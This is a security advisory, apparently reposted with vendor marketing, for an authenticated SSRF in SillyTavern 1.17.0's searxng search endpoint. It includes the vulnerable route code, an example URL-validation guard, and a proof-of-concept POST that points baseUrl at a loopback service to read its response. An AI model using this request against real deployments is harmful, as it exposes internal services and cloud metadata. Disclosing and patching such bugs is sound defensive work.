Summary
Resolution
SillyTavern 1.18.0 added a generic server-side request filter (Private Request Whitelisting). Since we expect users to use the application in a trusted environment, the filter is disabled by default, however it is strongly advised to be enabled and properly configured when an instance is being hosted over a network, as suggested by a console warning message and an officially published security checklist for administrators.
Documentation:
- https://docs.sillytavern.app/administration/config-yaml/#private-address-whitelisting
- https://docs.sillytavern.app/administration/#security-checklist
Note on future SSRF findings
Since the request filter applies to the entire application, no SSRF vulnerabilities against individual endpoints will be accepted, unless it has been proven that a properly configured and enabled filter can be bypassed in an undocumented way. Only advisories disclosed before the 1.18.0 release will be posted if their concern is SSRF.
SillyTavern 1.17.0 exposes /api/search/searxng, which accepts attacker-controlled baseUrl and uses it directly to build outbound server-side fetches. An authenticated low-privilege user can point baseUrl at an internal or loopback HTTP service and receive the /search response body.
Confirmed version: SillyTavern 1.17.0 from the audited source tree. Broader affected versions and patched versions should be confirmed by the maintainer.
Details
The /api/search/searxng route in src/endpoints/search.js reads baseUrl from request.body and performs no allowlist, IP range, DNS, or scheme validation before making outbound requests.
Core vulnerable path:
router.post('/searxng', async (request, response) => {
    const { baseUrl, query, preferences, categories } = request.body;
    if (!baseUrl || !query) {
        return response.status(400).send('Missing required parameters');
    }
    // Source: the attacker-controlled baseUrl is parsed and fetched with no host, scheme or IP-range check.
    const mainPageUrl = new URL(baseUrl);
    const mainPageRequest = await fetch(mainPageUrl, { headers: visitHeaders });
    ...
    const searchUrl = new URL('/search', baseUrl);
    const searchParams = new URLSearchParams();
    searchParams.append('q', query);
    ...
    // Sink: a second server-side fetch to the same attacker-selected origin.
    const searchResult = await fetch(searchUrl, { headers: visitHeaders });
    ...
    // The response body is relayed verbatim to the caller.
    const data = await searchResult.text();
    return response.send(data);
});
src/server-startup.js mounts this router at /api/search, and src/server-main.js applies login middleware before the API routes. This means the source is a remote authenticated POST request and the sink is server-side fetch() to attacker-selected hosts.
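A hardened outbound-URL check of the kind this route lacks, added here as an example and not SillyTavern's own code or its 1.18.0 request filter: the function names, the blocked-range table and the `allowedHosts` list are assumptions.

```javascript
// Added example, not SillyTavern's own code: an outbound-URL guard of the kind the
// 1.17.0 /searxng route lacked. Scheme and embedded credentials are checked, IP literals
// in loopback/private/link-local/unspecified ranges are rejected, and the host must
// appear in an operator-supplied allowlist (assumed configuration).
const BLOCKED_V4 = [ // [network, prefix length]
  ['0.0.0.0', 8], ['10.0.0.0', 8], ['100.64.0.0', 10], ['127.0.0.0', 8],
  ['169.254.0.0', 16], ['172.16.0.0', 12], ['192.168.0.0', 16],
];

function v4ToInt(ip) {
  return ip.split('.').reduce((acc, o) => ((acc << 8) + Number(o)) >>> 0, 0);
}

function inCidr4(ip, base, bits) {
  const mask = (0xffffffff << (32 - bits)) >>> 0;
  return ((v4ToInt(ip) & mask) >>> 0) === ((v4ToInt(base) & mask) >>> 0);
}

// True when the hostname is an IP literal a server must not fetch on a user's behalf.
// URL.hostname keeps the brackets around IPv6 literals, so they are stripped first.
function isPrivateIp(hostname) {
  const h = hostname.replace(/^\[|\]$/g, '').toLowerCase();
  if (/^\d+\.\d+\.\d+\.\d+$/.test(h)) return BLOCKED_V4.some(([b, n]) => inCidr4(h, b, n));
  if (h.includes(':')) { // IPv6 literal, already validated by the URL parser
    if (h === '::' || h === '::1') return true;
    if (/^fe[89ab]/.test(h) || /^f[cd]/.test(h)) return true; // fe80::/10, fc00::/7
    const dotted = h.match(/^::ffff:(\d+\.\d+\.\d+\.\d+)$/); // IPv4-mapped, dotted form
    if (dotted) return isPrivateIp(dotted[1]);
    const hex = h.match(/^::ffff:([0-9a-f]{1,4}):([0-9a-f]{1,4})$/); // IPv4-mapped, hex form
    if (hex) {
      const hi = parseInt(hex[1], 16), lo = parseInt(hex[2], 16);
      return isPrivateIp(`${hi >> 8}.${hi & 255}.${lo >> 8}.${lo & 255}`);
    }
    return false;
  }
  return false; // DNS name: resolve it and re-check the resolved address at connect time
}

// Validate a user-supplied baseUrl before any server-side fetch.
// Returns { ok: true, url } or { ok: false, reason }.
function checkOutboundUrl(baseUrl, allowedHosts) {
  let url;
  try { url = new URL(baseUrl); } catch { return { ok: false, reason: 'malformed URL' }; }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return { ok: false, reason: 'scheme not allowed' };
  if (url.username || url.password) return { ok: false, reason: 'credentials in URL' };
  // The WHATWG URL parser normalizes forms such as 2130706433 or 127.1 to 127.0.0.1 before this check.
  if (isPrivateIp(url.hostname)) return { ok: false, reason: 'private address' };
  if (!allowedHosts.includes(url.hostname)) return { ok: false, reason: 'host not in allowlist' };
  return { ok: true, url };
}
```

Because an allowlisted DNS name can still resolve to an internal address, a production guard also has to re-check the resolved address when the connection is made, which this literal-only check does not do.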
PoC
Attacker prerequisites: a valid SillyTavern web session, or access to a deployment where user accounts are disabled.
Start an internal mock service on the target host:
import http from 'node:http';

http.createServer((req, res) => {
    if (req.url === '/') {
        res.writeHead(200, { 'Content-Type': 'text/html' });
        return res.end('<html><head><link href="/client.css" rel="stylesheet"></head></html>');
    }
    if (req.url === '/client.css') {
        res.writeHead(200, { 'Content-Type': 'text/css' });
        return res.end('body{}');
    }
    if (req.url.startsWith('/search?q=')) {
        res.writeHead(200, { 'Content-Type': 'text/plain' });
        return res.end('INTERNAL-SEARCH-RESULT');
    }
    res.writeHead(404);
    res.end('not found');
}).listen(9091, '127.0.0.1');
Then send:
POST /api/search/searxng HTTP/1.1
Host: TARGET:8000
Cookie: session-...=...
X-CSRF-Token: <token from /csrf-token>
Content-Type: application/json

{"baseUrl":"http://127.0.0.1:9091/","query":"x"}
Result based on the route logic: SillyTavern first fetches http://127.0.0.1:9091/, then fetches http://127.0.0.1:9091/search?q=x, and returns INTERNAL-SEARCH-RESULT to the attacker.
Impact
This is an authenticated SSRF primitive with arbitrary host and port selection. It can disclose responses from loopback or internal HTTP services reachable from the SillyTavern host and may enable interaction with internal admin panels, development services, cloud metadata endpoints in applicable deployments, or service discovery across private networks.
Untrusted input controls the target URL of a server-initiated request, which may reach internal services not otherwise accessible from outside. Typical impact: access to internal metadata services, internal APIs, or cloud credentials.
CVE-2026-46372 has a CVSS score of 8.5 (High). The CVSS vector reflects a network attack vector, low privileges required and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (1.18.0); upgrading removes the vulnerable code path.
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-46372? CVE-2026-46372 is a high-severity server-side request forgery (SSRF) vulnerability in sillytavern (npm), affecting versions <= 1.17.0. It is fixed in 1.18.0. Untrusted input controls the target URL of a server-initiated request, which may reach internal services not otherwise accessible from outside.
- How severe is CVE-2026-46372? CVE-2026-46372 has a CVSS score of 8.5 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of sillytavern are affected by CVE-2026-46372? sillytavern (npm) versions <= 1.17.0 are affected.
- Is there a fix for CVE-2026-46372? Yes. CVE-2026-46372 is fixed in 1.18.0. Upgrade to this version or later.
- Is CVE-2026-46372 exploitable, and should I be worried? Whether CVE-2026-46372 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
- What actually determines whether CVE-2026-46372 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-46372? Upgrade sillytavern to 1.18.0 or later.